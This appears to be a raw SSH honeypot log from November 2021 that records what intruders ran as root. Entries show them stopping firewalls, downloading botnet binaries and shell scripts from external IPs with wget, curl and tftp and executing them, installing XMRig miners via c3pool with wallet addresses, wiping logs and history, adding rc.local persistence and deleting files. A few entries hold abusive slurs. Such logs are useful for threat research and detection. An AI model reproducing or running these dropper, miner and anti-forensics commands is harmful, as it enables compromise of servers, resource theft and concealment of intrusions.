From 180.215.108.229 4-Nov-2021 15:58:24 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.108.229:8009/Linux4.7;chmod 777 Linux4.7;./Linux4.7;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.108.229:8009/Linux4.7
chmod 777 Linux4.7
./Linux4.7

From 61.176.68.218 4-Nov-2021 23:45:15 ssh2 root
Exec cd /var/tmp; wget http://179.43.187.169/gunnybagsbunnybins.sh; curl -O http://179.43.187.169/gunnybagsbunnybins.sh; chmod 777 gunnybagsbunnybins.sh; sh gunnybagsbunnybins.sh; tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh; chmod 777 gunnybagsbunnytftp1.sh; sh gunnybagsbunnytftp1.sh; tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169; chmod 777 gunnybagsbunnytftp2.sh; sh gunnybagsbunnytftp2.sh; rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh; rm -rf *
cd /var/tmp
wget http://179.43.187.169/gunnybagsbunnybins.sh
curl -O http://179.43.187.169/gunnybagsbunnybins.sh
chmod 777 gunnybagsbunnybins.sh
sh gunnybagsbunnybins.sh
tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh
chmod 777 gunnybagsbunnytftp1.sh
sh gunnybagsbunnytftp1.sh
tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169
chmod 777 gunnybagsbunnytftp2.sh
sh gunnybagsbunnytftp2.sh
rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh
rm -rf *
Exec cd /var/tmp; wget http://179.43.187.169/gunnybagsbunnybins.sh; curl -O http://179.43.187.169/gunnybagsbunnybins.sh; chmod 777 gunnybagsbunnybins.sh; sh gunnybagsbunnybins.sh; tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh; chmod 777 gunnybagsbunnytftp1.sh; sh gunnybagsbunnytftp1.sh; tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169; chmod 777 gunnybagsbunnytftp2.sh; sh gunnybagsbunnytftp2.sh; rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh; rm -rf *
cd /var/tmp
wget http://179.43.187.169/gunnybagsbunnybins.sh
curl -O http://179.43.187.169/gunnybagsbunnybins.sh
chmod 777 gunnybagsbunnybins.sh
sh gunnybagsbunnybins.sh
tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh
chmod 777 gunnybagsbunnytftp1.sh
sh gunnybagsbunnytftp1.sh
tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169
chmod 777 gunnybagsbunnytftp2.sh
sh gunnybagsbunnytftp2.sh
rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh
rm -rf *

From 180.215.108.229 5-Nov-2021 10:56:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.108.229:8009/TI;chmod 777 TI;./TI
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.108.229:8009/TI
chmod 777 TI
./TI

From 5.189.168.79 5-Nov-2021 15:36:48 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://192.3.185.234/run.sh; curl -O http://192.3.185.234/run.sh; chmod 777 run.sh; sh run.sh; tftp 192.3.185.234 -c get run.sh; chmod 777 run.sh; sh run.sh; tftp -r run2.sh -g 192.3.185.234; chmod 777 run2.sh; sh run2.sh; ftpget -v -u anonymous -p anonymous -P 21 192.3.185.234 run1.sh run1.sh; sh run1.sh; rm -rf run.sh run.sh run2.sh run1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://192.3.185.234/run.sh
curl -O http://192.3.185.234/run.sh
chmod 777 run.sh
sh run.sh
tftp 192.3.185.234 -c get run.sh
chmod 777 run.sh
sh run.sh
tftp -r run2.sh -g 192.3.185.234
chmod 777 run2.sh
sh run2.sh
ftpget -v -u anonymous -p anonymous -P 21 192.3.185.234 run1.sh run1.sh
sh run1.sh
rm -rf run.sh run.sh run2.sh run1.sh
rm -rf *

From 154.12.2.254 5-Nov-2021 17:12:33 ssh2 root
w
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget zeusmedial.cl/-/mig
chmod +x mig
mv mig /usr/sbin/mig
mig -u root -n 1
lscpu
w
cat .bashistory
ls -alh
cat .mysql_history
cd .ssh
ls
cat lan.doc
nproc
uname -a
cat /etc/*release
cat /etc/passwd
w
cd /etc/passwd
ls
pwd
cd /root
ls
cd /
ls
exit

From 209.145.58.71 6-Nov-2021 06:50:09 ssh2 root
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
wget http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/mig-logcleaner11.tar.gz --no-check-certificate
tar xzvf mig-logcleaner11.tar.gz
cd mig-logcleaner
make linux
./mig-logcleaner -u root
cd ..
rm -rf mig-logcleaner11.tar.gz
rm -rf mig-logcleaner
w
uname -a
cat /proc/cpuinfo
ps -x
ps- x
cat /etc/issue

From 141.98.10.72 6-Nov-2021 20:49:48 ssh2 root
Exec sudo hive-passwd dayonef1edfujqicyhnyh1okugyllus12
sudo hive-passwd dayonef1edfujqicyhnyh1okugyllus12

From 205.185.115.39 7-Nov-2021 05:10:58 ssh2 root
Exec cat /etc/issue; cd /tmp/; rm -rf x86*; wget http://179.43.175.58/x86_64; chmod 777 *; ./x86_64 x86; echo Molov be suckin theese dicks, accrobat acting like goofy 
cat /etc/issue
cd /tmp/
rm -rf x86*
wget http://179.43.175.58/x86_64
chmod 777 *
./x86_64 x86
echo Molov be suckin theese dicks, accrobat acting like goofy

From 15.228.81.48 7-Nov-2021 06:55:05 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c

From 15.228.81.48 7-Nov-2021 07:31:08 ssh2 root
Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c
nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 138.68.105.229 7-Nov-2021 08:58:28 ssh2 root
Exec wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
wget nasapaul.com/ninfo
chmod +x *
./ninfo

From 15.228.81.48 7-Nov-2021 10:43:17 ssh2 root
Exec cd /var/tmp; wget http://179.43.187.169/gunnybagsbunnybins.sh; curl -O http://179.43.187.169/gunnybagsbunnybins.sh; chmod 777 gunnybagsbunnybins.sh; sh gunnybagsbunnybins.sh; tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh; chmod 777 gunnybagsbunnytftp1.sh; sh gunnybagsbunnytftp1.sh; tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169; chmod 777 gunnybagsbunnytftp2.sh; sh gunnybagsbunnytftp2.sh; rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh; rm -rf *
cd /var/tmp
wget http://179.43.187.169/gunnybagsbunnybins.sh
curl -O http://179.43.187.169/gunnybagsbunnybins.sh
chmod 777 gunnybagsbunnybins.sh
sh gunnybagsbunnybins.sh
tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh
chmod 777 gunnybagsbunnytftp1.sh
sh gunnybagsbunnytftp1.sh
tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169
chmod 777 gunnybagsbunnytftp2.sh
sh gunnybagsbunnytftp2.sh
rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh
rm -rf *
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 60.19.245.96 7-Nov-2021 11:29:46 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec cd /var/tmp; wget http://179.43.187.169/gunnybagsbunnybins.sh; curl -O http://179.43.187.169/gunnybagsbunnybins.sh; chmod 777 gunnybagsbunnybins.sh; sh gunnybagsbunnybins.sh; tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh; chmod 777 gunnybagsbunnytftp1.sh; sh gunnybagsbunnytftp1.sh; tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169; chmod 777 gunnybagsbunnytftp2.sh; sh gunnybagsbunnytftp2.sh; rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh; rm -rf *
cd /var/tmp
wget http://179.43.187.169/gunnybagsbunnybins.sh
curl -O http://179.43.187.169/gunnybagsbunnybins.sh
chmod 777 gunnybagsbunnybins.sh
sh gunnybagsbunnybins.sh
tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh
chmod 777 gunnybagsbunnytftp1.sh
sh gunnybagsbunnytftp1.sh
tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169
chmod 777 gunnybagsbunnytftp2.sh
sh gunnybagsbunnytftp2.sh
rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh
rm -rf *

From 107.189.30.134 7-Nov-2021 17:36:23 ssh2 root
Exec rm x86_64; wget http://205.185.121.185/x86_64; chmod 777 *; ./x86_64 fw.x86; rm x86_64
rm x86_64
wget http://205.185.121.185/x86_64
chmod 777 *
./x86_64 fw.x86
rm x86_64

From 209.141.33.121 8-Nov-2021 14:08:39 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 82.156.112.28 9-Nov-2021 06:23:34 ssh2 root
Exec curl http://82.156.112.28:8088/sevensu.x86 -o lin;chmod 777 lin;./lin
curl http://82.156.112.28:8088/sevensu.x86 -o lin
chmod 777 lin
./lin

From 60.19.245.96 9-Nov-2021 11:51:29 ssh2 root
Exec cd /var/tmp; wget http://179.43.187.169/gunnybagsbunnybins.sh; curl -O http://179.43.187.169/gunnybagsbunnybins.sh; chmod 777 gunnybagsbunnybins.sh; sh gunnybagsbunnybins.sh; tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh; chmod 777 gunnybagsbunnytftp1.sh; sh gunnybagsbunnytftp1.sh; tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169; chmod 777 gunnybagsbunnytftp2.sh; sh gunnybagsbunnytftp2.sh; rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh; rm -rf *
cd /var/tmp
wget http://179.43.187.169/gunnybagsbunnybins.sh
curl -O http://179.43.187.169/gunnybagsbunnybins.sh
chmod 777 gunnybagsbunnybins.sh
sh gunnybagsbunnybins.sh
tftp 179.43.187.169 -c get gunnybagsbunnytftp1.sh
chmod 777 gunnybagsbunnytftp1.sh
sh gunnybagsbunnytftp1.sh
tftp -r gunnybagsbunnytftp2.sh -g 179.43.187.169
chmod 777 gunnybagsbunnytftp2.sh
sh gunnybagsbunnytftp2.sh
rm -rf gunnybagsbunnybins.sh gunnybagsbunnytftp1.sh gunnybagsbunnytftp2.sh
rm -rf *

From 205.185.120.183 9-Nov-2021 16:46:10 ssh2 root
Exec wget 185.245.96.31/x86_64; wget 185.245.96.31/i686; wget 185.245.96.31/arm; wget 185.245.96.31/arc; wget 185.245.96.31/arm5; wget 185.245.96.31/arm6; wget 185.245.96.31/arm7; wget 185.245.96.31/i586; wget 185.245.96.31/mips; wget 185.245.96.31/mipsel; wget 185.245.96.31/sh4; chmod 777 *; ./arc x86; ./arm x86; ./arm5 x86; ./arm6 x86; ./arm7 x86; ./i586 x86; ./i686 x86; ./mips x86; ./mipsel x86; ./sh4 x86; ./x86_64 x86;
wget 185.245.96.31/x86_64
wget 185.245.96.31/i686
wget 185.245.96.31/arm
wget 185.245.96.31/arc
wget 185.245.96.31/arm5
wget 185.245.96.31/arm6
wget 185.245.96.31/arm7
wget 185.245.96.31/i586
wget 185.245.96.31/mips
wget 185.245.96.31/mipsel
wget 185.245.96.31/sh4
chmod 777 *
./arc x86
./arm x86
./arm5 x86
./arm6 x86
./arm7 x86
./i586 x86
./i686 x86
./mips x86
./mipsel x86
./sh4 x86
./x86_64 x86

From 193.105.6.242 10-Nov-2021 02:11:31 ssh2 root
Exec nproc; nvidia-smi --list-gpus
nproc
nvidia-smi --list-gpus

From 209.141.46.12 10-Nov-2021 05:38:52 ssh2 root
Exec curl -O http://209.141.46.12/test;chmod 777 test;./test
curl -O http://209.141.46.12/test
chmod 777 test
./test
Exec curl -O http://209.141.46.12/test;chmod 777 test;./test
curl -O http://209.141.46.12/test
chmod 777 test
./test

From 209.141.46.12 10-Nov-2021 09:38:37 ssh2 root
Exec curl -O http://209.141.46.12/LINUX;chmod 777 *;./LINUX
curl -O http://209.141.46.12/LINUX
chmod 777 *
./LINUX

From 58.64.185.50 11-Nov-2021 05:05:38 ssh2 root
Exec echo -n dzgmzwwc|md5sum;uname -a
echo -n dzgmzwwc|md5sum
uname -a

From 20.206.86.43 11-Nov-2021 05:22:45 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 209.141.46.12 12-Nov-2021 03:28:17 ssh2 root
Exec wget http://209.141.46.12/Linux2.6;chmod 777 *;./Linux2.6
wget http://209.141.46.12/Linux2.6
chmod 777 *
./Linux2.6

From 93.123.93.104 12-Nov-2021 09:44:33 ssh2 root
Exec uname -a;cd /tmp;wget http://66.151.51.55/max.txt;perl max.txt;rm -rf max.*;history -c;clear
uname -a
cd /tmp
wget http://66.151.51.55/max.txt
perl max.txt
rm -rf max.*
history -c
clear

From 142.93.219.198 13-Nov-2021 02:40:15 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://149.56.35.183/skidnet.sh; chmod 777 *; sh skidnet.sh; tftp -g 149.56.35.183 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://149.56.35.183/skidnet.sh
chmod 777 *
sh skidnet.sh
tftp -g 149.56.35.183 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 129.227.219.30 13-Nov-2021 05:49:57 ssh2 root
w

From 51.68.180.71 13-Nov-2021 05:50:01 ssh2 root
lscpu
exit

From 129.227.219.30 13-Nov-2021 05:50:28 ssh2 root
crontab -l
ping yahoo.com
id richard
reboot
/sbin/init
fuck you asshole :))))
did you see my dick ?????
you faggot

From 136.144.41.139 13-Nov-2021 06:45:32 ssh2 root
Exec curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 45dNkjTQGgT77r9AEMyHdCGan5tpuekXaHFhFW99dQ8hUS35oZQEYXddFE52jxVdfUNrAD4ZyZ44BgHfgk5SjHdoLjGdJnQ
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"

From 209.141.46.12 13-Nov-2021 22:53:39 ssh2 root
Exec wget http://209.141.46.12/Linux4.7;chmod 777 *;./Linux4.7
wget http://209.141.46.12/Linux4.7
chmod 777 *
./Linux4.7
Exec wget http://209.141.46.12/Linux4.7;chmod 777 *;./Linux4.7
wget http://209.141.46.12/Linux4.7
chmod 777 *
./Linux4.7

From 209.141.59.77 14-Nov-2021 01:58:55 ssh2 root
Exec wget dawis.tw/x86_64; wget dawis.tw/i686; wget dawis.tw/arm; wget dawis.tw/arc; wget dawis.tw/arm5; wget dawis.tw/arm6; wget dawis.tw/arm7; wget dawis.tw/i586; wget dawis.tw/mips; wget dawis.tw/mipsel; wget dawis.tw/sh4; chmod 777 *; ./arc x86; ./arm x86; ./arm5 x86; ./arm6 x86; ./arm7 x86; ./i586 x86; ./i686 x86; ./mips x86; ./mipsel x86; ./sh4 x86; ./x86_64 x86
wget dawis.tw/x86_64
wget dawis.tw/i686
wget dawis.tw/arm
wget dawis.tw/arc
wget dawis.tw/arm5
wget dawis.tw/arm6
wget dawis.tw/arm7
wget dawis.tw/i586
wget dawis.tw/mips
wget dawis.tw/mipsel
wget dawis.tw/sh4
chmod 777 *
./arc x86
./arm x86
./arm5 x86
./arm6 x86
./arm7 x86
./i586 x86
./i686 x86
./mips x86
./mipsel x86
./sh4 x86
./x86_64 x86

From 222.186.34.114 14-Nov-2021 12:38:31 ssh2 root
Exec wget http://222.186.34.114:280/why9271;chmod 777 why9271;./why9271
wget http://222.186.34.114:280/why9271
chmod 777 why9271
./why9271

From 111.67.194.201 14-Nov-2021 14:54:02 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;rm -f *;cd /home;rm -f *;wget http://139.99.91.161/pl.sh;chmod 777 pl.sh;./pl.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
rm -f *
cd /home
rm -f *
wget http://139.99.91.161/pl.sh
chmod 777 pl.sh
./pl.sh

From 42.193.169.139 15-Nov-2021 03:10:40 ssh2 root
Exec curl -s -L http://152.136.149.104:280/1.sh | bash -s
curl -s -L http://152.136.149.104:280/1.sh | bash -s

From 111.67.206.137 15-Nov-2021 08:54:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://111.67.206.137/sora.sh;chmod 777 sora.sh;sh sora.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://111.67.206.137/sora.sh
chmod 777 sora.sh
sh sora.sh
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://111.67.206.137/sora.sh;chmod 777 sora.sh;sh sora.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://111.67.206.137/sora.sh
chmod 777 sora.sh
sh sora.sh

From 111.67.206.137 15-Nov-2021 11:28:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://111.67.206.137/Pls;chmod 777 Pls;./Pls;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://111.67.206.137/Pls
chmod 777 Pls
./Pls

From 111.67.206.137 15-Nov-2021 17:43:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://111.67.206.137/Kjl;chmod 777 Kjl;./Kjl;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://111.67.206.137/Kjl
chmod 777 Kjl
./Kjl
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://111.67.206.137/Kjl;chmod 777 Kjl;./Kjl;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://111.67.206.137/Kjl
chmod 777 Kjl
./Kjl

From 139.198.33.96 15-Nov-2021 20:24:21 ssh2 root
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 209.141.59.77 15-Nov-2021 21:14:05 ssh2 root
Exec wget dawis.tw/x86_64; wget dawis.tw/i686; wget dawis.tw/arm; wget dawis.tw/arc; wget dawis.tw/arm5; wget dawis.tw/arm6; wget dawis.tw/arm7; wget dawis.tw/i586; wget dawis.tw/mips; wget dawis.tw/mipsel; wget dawis.tw/sh4; chmod 777 *; ./arc x86; ./arm x86; ./arm5 x86; ./arm6 x86; ./arm7 x86; ./i586 x86; ./i686 x86; ./mips x86; ./mipsel x86; ./sh4 x86; ./x86_64 x86
wget dawis.tw/x86_64
wget dawis.tw/i686
wget dawis.tw/arm
wget dawis.tw/arc
wget dawis.tw/arm5
wget dawis.tw/arm6
wget dawis.tw/arm7
wget dawis.tw/i586
wget dawis.tw/mips
wget dawis.tw/mipsel
wget dawis.tw/sh4
chmod 777 *
./arc x86
./arm x86
./arm5 x86
./arm6 x86
./arm7 x86
./i586 x86
./i686 x86
./mips x86
./mipsel x86
./sh4 x86
./x86_64 x86

From 8.225.226.100 17-Nov-2021 10:56:30 ssh2 root
Exec uname -a;wget -4 http://www.fredfoxs.at.ua/files/test;curl -O http://www.fredfoxs.at.ua/files/test;dget -4 http://www.fredfoxs.at.ua/files/test;tar -xzf test;rm -f test;cd ./-s;rpm -Uvh shc.rpm;./.s;sleep 50;rm -rf ./-s;rm -rf /dev/shm/c3pool /root/c3pool;pkill -f xmrig;rm -rf ~/.bash_history;history -cw
uname -a
wget -4 http://www.fredfoxs.at.ua/files/test
curl -O http://www.fredfoxs.at.ua/files/test
dget -4 http://www.fredfoxs.at.ua/files/test
tar -xzf test
rm -f test
cd ./-s
rpm -Uvh shc.rpm
./.s
sleep 50
rm -rf ./-s
rm -rf /dev/shm/c3pool /root/c3pool
pkill -f xmrig
rm -rf ~/.bash_history
history -cw

From 222.186.133.160 17-Nov-2021 13:49:27 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudu5;chmod 777 sudu5;./sudu5;echo "cd /tmp/">>/etc/rc.local;echo "./sudu5&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudu5
chmod 777 sudu5
./sudu5
echo "cd /tmp/">>/etc/rc.local
echo "./sudu5
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudu5;chmod 777 sudu5;./sudu5;echo "cd /tmp/">>/etc/rc.local;echo "./sudu5&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudu5
chmod 777 sudu5
./sudu5
echo "cd /tmp/">>/etc/rc.local
echo "./sudu5
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 216.240.130.102 17-Nov-2021 18:23:09 ssh2 root
Exec echo -e "\x6F\x6B"
echo -e "\x6F\x6B"
Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr
uname -a
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4AXp4BAFuqCUNLJ3X12FKg7jp9MQjiMeWG1bMme9znFNPvhP2LqGXUF5pEfaeMQ7FAArXVWnUAEEMF2Kms6xzjMGVagomWr

From 222.186.133.160 17-Nov-2021 22:47:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudo;chmod 777 sudo;./sudo;echo "cd /tmp/">>/etc/rc.local;echo "./sudo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudo
chmod 777 sudo
./sudo
echo "cd /tmp/">>/etc/rc.local
echo "./sudo
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudo;chmod 777 sudo;./sudo;echo "cd /tmp/">>/etc/rc.local;echo "./sudo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudo
chmod 777 sudo
./sudo
echo "cd /tmp/">>/etc/rc.local
echo "./sudo
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 212.193.30.209 18-Nov-2021 23:19:41 ssh2 root
ls
pwd
last
w
uptime
ls /var/log
top

From 107.189.10.234 19-Nov-2021 01:07:27 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://107.189.10.234:8009/Linux4.7;chmod 777 Linux4.7;./Linux4.7;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://107.189.10.234:8009/Linux4.7
chmod 777 Linux4.7
./Linux4.7

From 222.186.133.160 19-Nov-2021 04:45:32 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.133.160:8090/sudo;chmod 777 sudo;./sudo;echo "cd /tmp/">>/etc/rc.local;echo "./sudo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.133.160:8090/sudo
chmod 777 sudo
./sudo
echo "cd /tmp/">>/etc/rc.local
echo "./sudo
">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.133.160 19-Nov-2021 04:49:16 ssh2 root
